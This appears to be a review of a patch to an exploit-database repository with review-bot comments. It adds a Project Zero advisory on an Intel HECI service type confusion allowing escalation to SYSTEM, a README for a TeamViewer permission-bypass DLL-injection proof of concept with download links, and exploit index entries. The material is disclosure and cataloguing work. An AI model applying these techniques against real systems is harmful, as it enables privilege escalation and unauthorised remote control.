1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->
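Review bot: this hunk has no technical-details section, unlike the sibling jscript advisories, so nothing links the PoC to the crash; one sentence would do it. The PoC compiles a pattern with 99 empty groups (`Array(100).join('()')` yields 99 `()` pairs) and the fault is `movsxd rbp,dword ptr [rbx+rcx*8+0ACh]` with rcx=0000000000000063, i.e. 99, which appears consistent with LastParen indexing the capture table one past the last valid group. Also "obsorve" should be "observe".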

@ -0,0 +1,93 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1358
Intel Content Protection HECI Service Type Confusion EoP
Platform: Tested on Windows 10, service version 9.0.2.117
Class: Elevation of Privilege
Summary:
The Intel Content Protection HECI Service exposes a DCOM object to all users and most sandboxes (such as Edge LPAC and Chrome GPU). It has a type confusion vulnerability which can be used to elevate to SYSTEM privileges.
Description:
The Intel Content Protection HECI Service runs as LocalSystem and hosts a DCOM service. The main function is StartIo which takes an input variant and returns a variant. Based on what its trying to do Id assume the input variant is supposed to be a byte array, however it contains a bug.
The vulnerable code is roughly:
HRESULT StartIo(VARIANT In, VARIANT* Out) {
CComSafeArray<char> array;
array::CopyFrom(In.parray);
// Work with array
...
}
The issue here is that the In variant is used as a SAFEARRAY without checking that the VARIANT contains a SAFEARRAY. This leads to type confusion, for example a caller could pass VT_UI4 integer with any value they like and this code would interpret that integer as a pointer to a SAFEARRAY structure. This might seem to be only an arbitrary read issue, however the copy of the safe array can be made to execute arbitrary memory. If you point the type confused pointer at a block of memory which looks like a IUnknown array then when copying the array it will try and add a reference to each COM object in the array. This causes a VTable dispatch to AddRef which if carefully crafted should get arbitrary code execution.
The call to CopyFrom does verify that the variant type is VT_UI1 (a byte array) however you can set some feature flags such as FADF_UNKNOWN which will force a call to IUnknown::AddRef on the elements of the array without changing the supposed variant type. Also you dont need to guess the allocation address for the fake safearray as you can use a byte length BSTR which contains arbitrary data. The BSTR length field and the SAFEARRAY variant field lines up so as long as the lower 16 bits of the length is set to 17 (which is VT_UI1) it passes the checks and reads out the arbitrary contents from the allocated BSTR.
The really bad thing about this service is not only is it intentionally designed to be accessible from even a heavily restrictive sandbox such as Edge LPAC but it runs with full LocalSystem privileges. While on Win10 CFG might make it harder to exploit, on Win7 you dont have any such protection. Also the call is done inside an exception handler so even if the wrong address is chosen the service wont crash (except for fast fail such as CFG).
The following is an example crash when sending a fake safe array to the service (with just a dummy address of 0x18181818 as the IUnknown memory location).
(1110.1188): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=18181818 ebx=001e6290 ecx=18181818 edx=00209390 esi=11d41024 edi=18181818
eip=18181818 esp=0126efc4 ebp=0126efec iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
18181818 1818 sbb byte ptr [eax],bl ds:002b:18181818=18
0:003> k
# ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 0126efc0 74f740fb 0x18181818
01 0126efec 74f73e42 OLEAUT32!SafeArrayCopyData+0x21b
02 0126f018 010335d3 OLEAUT32!SafeArrayCopy+0x182
03 0126f030 01034e1b IntelCpHeciSvc+0x135d3
04 0126f118 750326e0 IntelCpHeciSvc+0x14e1b
05 0126f144 74ff4fc2 RPCRT4!Invoke+0x34
06 0126f598 7525555e RPCRT4!NdrStubCall2+0x452
07 0126f5e4 74f70706 combase!CStdStubBuffer_Invoke+0xde [onecore\com\combase\ndr\ndrole\stub.cxx @ 1449]
08 0126f614 75300c48 OLEAUT32!CUnivStubWrapper::Invoke+0x136
09 (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing::__l6::<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667>::operator()+0x4e [onecore\com\combase\dcomrem\channelb.cxx @ 1824]
0a 0126f668 75303621 combase!ObjectMethodExceptionHandlingAction<<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667> >+0xa8 [onecore\com\combase\dcomrem\excepn.hxx @ 91]
0b (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing+0x8e [onecore\com\combase\dcomrem\channelb.cxx @ 1822]
0c 0126f78c 75307330 combase!DefaultStubInvoke+0x221 [onecore\com\combase\dcomrem\channelb.cxx @ 1891]
0d (Inline) -------- combase!SyncStubCall::Invoke+0x22 [onecore\com\combase\dcomrem\channelb.cxx @ 1948]
0e (Inline) -------- combase!SyncServerCall::StubInvoke+0x22 [onecore\com\combase\dcomrem\servercall.hpp @ 779]
0f (Inline) -------- combase!StubInvoke+0x287 [onecore\com\combase\dcomrem\channelb.cxx @ 2173]
10 0126f90c 7530009b combase!ServerCall::ContextInvoke+0x440 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1541]
11 (Inline) -------- combase!CServerChannel::ContextInvoke+0x669 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1437]
12 (Inline) -------- combase!DefaultInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3532]
13 (Inline) -------- combase!ClassicSTAInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3296]
14 0126f9ac 75302b39 combase!AppInvoke+0x8bb [onecore\com\combase\dcomrem\channelb.cxx @ 1604]
15 0126fb3c 7530ff85 combase!ComInvokeWithLockAndIPID+0x599 [onecore\com\combase\dcomrem\channelb.cxx @ 2722]
16 0126fb98 7531056b combase!ComInvoke+0x1c5 [onecore\com\combase\dcomrem\channelb.cxx @ 2242]
17 (Inline) -------- combase!ThreadDispatch+0x83 [onecore\com\combase\dcomrem\chancont.cxx @ 421]
18 0126fbd8 76b12b5b combase!ThreadWndProc+0x21b [onecore\com\combase\dcomrem\chancont.cxx @ 741]
19 0126fc04 76b050f3 USER32!_InternalCallWinProc+0x2b
1a 0126fcec 76b04a82 USER32!UserCallWinProcCheckWow+0x2d3
1b 0126fd60 76b04850 USER32!DispatchMessageWorker+0x222
1c 0126fd6c 010364e1 USER32!DispatchMessageW+0x10
1d 0126fda0 01037039 IntelCpHeciSvc+0x164e1
1e 0126fda8 0103e562 IntelCpHeciSvc+0x17039
1f 0126fde0 0103e5ec IntelCpHeciSvc+0x1e562
20 0126fdec 76928744 IntelCpHeciSvc+0x1e5ec
21 0126fe00 770a582d KERNEL32!BaseThreadInitThunk+0x24
22 0126fe48 770a57fd ntdll!__RtlUserThreadStart+0x2f
23 0126fe58 00000000 ntdll!_RtlUserThreadStart+0x1b
Proof of Concept:
Ive provided a PoC as a VS project which you can run which will cause the service to access invalid memory. Note that youll need a debugger attached to IntelCpHeciSvc.exe as the RPC/DCOM dispatch will swallow the exception, it doesnt crash the service. The Poc builds a fake SAFEARRAY structure and passes it as a BSTR to the service which gets interpreted as a pointer to a SAFEARRAY. Ultimately it tries to copy the array and will call AddRef on elements of the array.
1) Attach a debugger to IntelCpHeciSvc.exe
2) Compile and run the provided poc.
Expected Result:
Sending the fake SAFEARRAY should fail.
Observed Result:
The service tries to execute invalid memory at 0x18181818 (or at least crashes on an invalid memory location).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43373.zip
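Review bot: "Proof of Concept:" appears as a heading twice in this hunk, once above the steps and once above the download link; rename the second to "Download:" or fold the link under the first. In the code sketch, `array::CopyFrom(In.parray)` applies scope resolution to an instance and should be `array.CopyFrom(In.parray)`. Apostrophes have been dropped throughout the prose ("its trying", "Id", "dont", "wont", "Ive", "youll", "doesnt"), which looks like an encoding problem worth fixing before this lands.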

@ -0,0 +1,34 @@
# TeamViewer Permissions Hook V1
---
[![License](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/gellin/TeamViewer_Permissions_Hook_V1/blob/master/LICENSE)
**A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions.**
## Features
* **As the Server** - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
* **As the Client** - Allows for control of mouse with disregard to servers current control settings and permissions.
## Demo
#### As the Server
![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/server_switch_sides.gif)
#### Client
![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/client_takes_control.gif)
## Rundown
* Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes.
* Inject and follow the steps
## Requirements
* Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe"
* This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported)
## Disclaimer
* Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.
## Credit
[@timse93](https://github.com/timse93) - Research and Testing
## EDB-Note
Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43366.zip
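Review bot: style nits in the README hunk: "I do not condone the or support the use" has a stray "the"; "Built" mid-sentence should be lowercase; "linux not supported" should read "Linux not supported". The Requirements line states the only tested build is TeamViewer x86 13.0.5058 and that other versions are untested; keep that sentence, since it is the only version evidence the file gives.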

@ -5424,6 +5424,13 @@ id,file,description,date,author,type,platform,port
43352,exploits/windows/dos/43352.py,"CDex 1.96 - Buffer Overflow",2017-12-18,bzyo,dos,windows,
43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,
43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow",2017-12-18,Conviso,dos,linux,
43367,exploits/windows/dos/43367.html,"Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
43368,exploits/windows/dos/43368.html,"Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
43369,exploits/windows/dos/43369.html,"Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD",2017-12-19,"Google Security Research",dos,windows,
43370,exploits/windows/dos/43370.html,"Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow",2017-12-19,"Google Security Research",dos,windows,
43371,exploits/windows/dos/43371.html,"Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable",2017-12-19,"Google Security Research",dos,windows,
43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
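Review bot: The new row for 43373 files "Intel Content Protection HECI Service - Type Confusion Privilege Escalation" under type `dos` with path exploits/windows/dos/43373.txt, although the description is a privilege escalation; the other privilege-escalation entries in this patch (for example 43366 in the -9223 hunk, and the existing 41607 "COM Session Moniker Privilege Escalation" context row there) are typed `local` under exploits/windows/local/. Confirm the intended classification, and if it should be `local`, change both the `type` column and the file path together so they stay consistent.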
@ -9223,6 +9230,7 @@ id,file,description,date,author,type,platform,port
41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
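Review bot: The 43366 row carries the date 2017-12-04 while every other row added by this patch is dated 2017-12-19; confirm this is the intended original publication date of the TeamViewer PoC rather than a typo, since the `date` column is what the index sorts and searches on.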
@ -15850,6 +15858,8 @@ id,file,description,date,author,type,platform,port
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -37640,6 +37650,8 @@ id,file,description,date,author,type,platform,port
43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
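Review bot: The description for 43364 misspells "Vulnerabilities" as "Vulnerablities"; since this column is the searchable title shown in the index, correct it to "BrightSign Digital Signage - Multiple Vulnerabilities" before merging.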
